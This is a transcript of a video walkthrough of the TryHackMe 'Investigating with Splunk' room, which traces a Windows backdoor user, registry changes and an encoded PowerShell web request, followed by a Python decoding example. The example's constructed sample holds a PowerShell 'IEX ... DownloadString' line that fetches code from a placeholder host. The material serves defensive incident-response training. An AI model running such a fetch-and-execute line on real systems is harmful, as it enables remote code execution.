Cyber Incident Investigation with Splunk | TryHackMe Investigating with Splunk

Captions
What's going on guys, welcome back. Today we're doing a bit of a challenge with Splunk. The room name is Investigating with Splunk, and we're given a scenario. We're required to answer the questions in an attempt to analyze what happened and what was the reason, or the key artifacts, of the breach. So if you read the description, it says: SOC analyst Johnny has observed some anomalous behaviors in the logs of a few Windows machines. So that's where the incident happened, on a Windows workstation. It looks like the adversary already has access to some of these machines and successfully created some backdoor. His manager has asked him to pull those logs from suspected hosts and ingest them into Splunk for quick investigation. So there you go: a Windows machine, or a couple of Windows machines, have been compromised, the Windows event logs have been pulled and uploaded to Splunk for quick investigation, and we are required to find out what happened. Our task as a SOC analyst is to examine the logs and identify the anomalies.

Okay, so deploying the machine, here we have Splunk. Now the data has been uploaded and it's available to access. As we mentioned in the previous video, when you upload data you create an index. The index for the data is index=main, and by retrieving the index we will retrieve all the events. Make sure to click on All time, and we have a total of 12,256 events. That's it for the first question.

Okay: on one of the infected hosts, the adversary was successful in creating a backdoor user. What is the username? Okay, so basically we're looking to find out how the username has been created. We have two methods: we can either search for the command, or we can search for the event ID. So here on the left we have event IDs, over 55, and if we look at the command we don't have a filter or field for command line, so we're gonna filter by event ID, and specifically we're going to filter for the event ID that refers to a user creation, which happens to be 4720. Four seven two zero, and that would give us only one event, which actually indicates that a user account was created. So finding out the account name, we scroll down and we see it's A1berto. It's "Alberto", but the one replaces the L. So that's the account name, or the username, that has been created.

On the same host, a registry key was also updated regarding the new backdoor user. What's the full path of that registry key? So here we're looking to find out all the events where a registry key has been added, modified or deleted. If we take a look at the left we can see the category, and we can see the top 10 values of the event categories. You can see this "Registry object added or deleted" exactly describes the question, so registry key added or deleted. We click on that and we have 1,496 events. All right, so to filter these down more, we're looking to find the events that are related to the new backdoor user, which happens to be A1berto, and now we narrowed down the number to two. So we have two events, and from here we can find out the registry key that has been deleted. As you can see, DeleteKey, and this is the key. How about the other event? If we take a look down there we see CreateKey, but we're not looking at keys that were created, we're looking for the keys that were modified or updated or deleted, which happens to be this key. So a user account has been created and a registry key was modified as such.

Examine the logs and identify the user that the adversary was trying to impersonate. So basically the adversary has created a backdoor user, it is A1berto. By choosing this name they were trying to impersonate a specific, currently existing username. So we have to take a look again at the current users on the host and see which one is similar to A1berto. So we have Alberto, that's the real one. Alberto, that's the real username. Okay, the backdoor one, the fake version, was A1berto; the real one is Alberto. That is the name that the attacker was trying to impersonate so that they go undetected in the attack. So up until now the attacker got access, they created one username, or a backdoor username, called A1berto that looks similar to Alberto.

Next: what's the command used to add a backdoor user from a remote computer? So from here we are trying to find out how the username A1berto has been created. Okay, there must be a command that has been executed from a remote computer. Why? Because the Windows machines have been compromised, of course, from the attacker computer, which is a remote computer. The attacker executed a command on their machine, the remote computer, to add the backdoor user. We want to find out this command. How we ended up with this command here, okay, so if we go back, index=main, and here we search for "net user", so that's the only command that's actually used to add a username. So "net user", scrolling down, taking a look at the fields here. So we're looking to find out the exact command, but we ended up with 6,000 events. For users, if we narrow this down to Alberto we have three in the command line, we have three commands, but these are not the commands we're looking for. So we're going to go back. Let's see here: the attacker executed the command from a remote computer, so not exactly the username. So we're looking for here "net user", we have 6,000 events, we have to narrow this down somehow. If we search for wmic, 89 events, still we are far from the answer. We're looking here to find out the exact command but we're getting too many events for the "net user add". Okay, going back. So the attacker first got access as one of these users. This user is the original user. How about James? Command line: four command lines. So why I selected James here: basically James could be the username that the attacker got access to when they first compromised the machine. So if I look at the command line field I see four interesting commands, and I can see this one, C:\Windows\System32\wmic, indicating that the attacker got access through PowerShell, specifically Evil-WinRM, and executed this command to add the user A1berto. So A1berto is a backdoor username that has been created with this command, starting from the first access, or the first foothold account, which was James. So that's the command.

How many times was the login attempt from the backdoor user observed during the investigation? How many times did they log in with the backdoor user? The name is A1berto. We want to find out in the category here what are the events. We're looking to find if there is a logon. So there is no logon, meaning there is no login or successful login with this username. Taking a look at the event IDs, we have eight event IDs, and none of these event IDs match a successful or failed login attempt, which means we are left with zero.

What's the name of the infected host on which suspicious PowerShell commands were executed? So here we are also trying to find out the hostname of the infected machine. We already found that the username was James, so if we go back and type PowerShell, just PowerShell, as you can see here it gives you all of the PowerShell commands that have been executed, and the host happens to be James Brown.

PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution? PowerShell logging is a feature that lets you log all of the PowerShell commands executed on a specific host. The catch is, once you enable PowerShell logging, an event ID is triggered in Windows. The event ID is 4103. So we want to find out how many events were generated as a result of PowerShell logging; we have to filter for this event ID. So EventID 4103, exactly, we have 79 events.

An encoded PowerShell script from the infected host initiated the web request. What's the full URL? Okay, back to PowerShell. So we want to decode the command that has been executed. There is exactly one, only one, command, which is this one, so we're looking to decode this command. Scrolling all the way down, let's copy all of that and we will go to CyberChef, From Base64. We can delete all of these, and down there, okay, so we have decoded the Base64, but as you can see we need some encoding, some modifications on the output. So we're going to use Decode text. So this is text, I'm going to need to decode this to a format that we can understand. UTF-8, exactly... not good. UTF-16, this one sounds good. Okay, so now if we scroll down we see here the user agent. Right after we set the user agent, we see a Base64 string, and right after this thing we have a directory or path indicating that a new page named news.php, or a file named news, has been accessed. So that's the path of the URL. What about the URL itself? I'm going to duplicate this, copy the Base64. Probably this Base64, if we decode it, we will have the URL, the full URL. As you can see it is the IP address. Now if you take that, slash news.php, we have the full URL, but we need to write the full one in a specific format, as you can see, defang the URL. So we go to, um, let's see, remove these, and this is the final answer.

That was an intermediate challenge with Splunk. It didn't involve so many filters, so many processing search queries in Splunk. It was just simple analysis of an incident; it required us to understand the event IDs and how to jump between different stages during a compromise. Okay guys, I hope you liked that and I will definitely see you in the next video.
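The decoding steps walked through in the last question (From Base64, Decode text as UTF-16LE, decode the inner Base64 string, then defang the URL), as an added Python example that is not part of the video or the TryHackMe room. The PowerShell script and its encoded form are constructed here, and 192.0.2.10 is a TEST-NET placeholder standing in for the real indicator, which is not reproduced.

```python
import base64
import re

# Constructed sample (not the room's data): a PowerShell script of the shape the video
# decodes, with its URL hidden in an inner Base64 literal. 192.0.2.10 is a placeholder.
INNER_URL = "http://192.0.2.10/news.php"
SAMPLE_SCRIPT = (
    "$wc = New-Object System.Net.WebClient;"
    "$wc.Headers.Add('User-Agent','Mozilla/5.0');"
    "IEX $wc.DownloadString([Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String('" + base64.b64encode(INNER_URL.encode()).decode() + "')))"
)
# What PowerShell's -EncodedCommand carries, and what the logging event records: Base64 over UTF-16LE.
ENCODED_COMMAND = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()

B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"]+")

def decode_encoded_command(b64: str) -> str:
    """Step 1 (CyberChef 'From Base64' then 'Decode text' UTF-16LE): recover the script."""
    return base64.b64decode(b64).decode("utf-16-le")

def decode_blob(raw: bytes) -> str:
    """UTF-16LE when every odd byte is NUL (PowerShell's 'Unicode'), otherwise strict UTF-8."""
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")

def expand_nested_base64(script: str) -> str:
    """Step 2: decode Base64 literals inside the script; leave tokens that are not text alone."""
    def _sub(m: re.Match) -> str:
        try:
            text = decode_blob(base64.b64decode(m.group(0), validate=True))
        except (ValueError, UnicodeDecodeError):
            return m.group(0)  # identifiers like FromBase64String fail the decode and stay as-is
        return text if text.isascii() and text.isprintable() else m.group(0)
    return B64_RE.sub(_sub, script)

def extract_urls(script: str) -> list[str]:
    """Step 3: URLs visible once the nesting is undone."""
    return URL_RE.findall(script)

def defang(url: str) -> str:
    """Step 4: write the indicator in the non-clickable form the room asks for (hxxp, [.] in the host)."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path

def investigate(encoded: str) -> list[str]:
    """Whole pipeline: encoded command field in, defanged URLs out."""
    return [defang(u) for u in extract_urls(expand_nested_base64(decode_encoded_command(encoded)))]
```

Running `investigate(ENCODED_COMMAND)` on the constructed sample yields `['hxxp://192[.]0[.]2[.]10/news.php']`; feeding it the Base64 value copied out of a real 4103 event reproduces the CyberChef recipe offline.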
Info
Channel: Motasem Hamdan
Views: 12,843
Id: S9hkw-fsO5Q
Length: 14min 27sec (867 seconds)
Published: Tue Nov 08 2022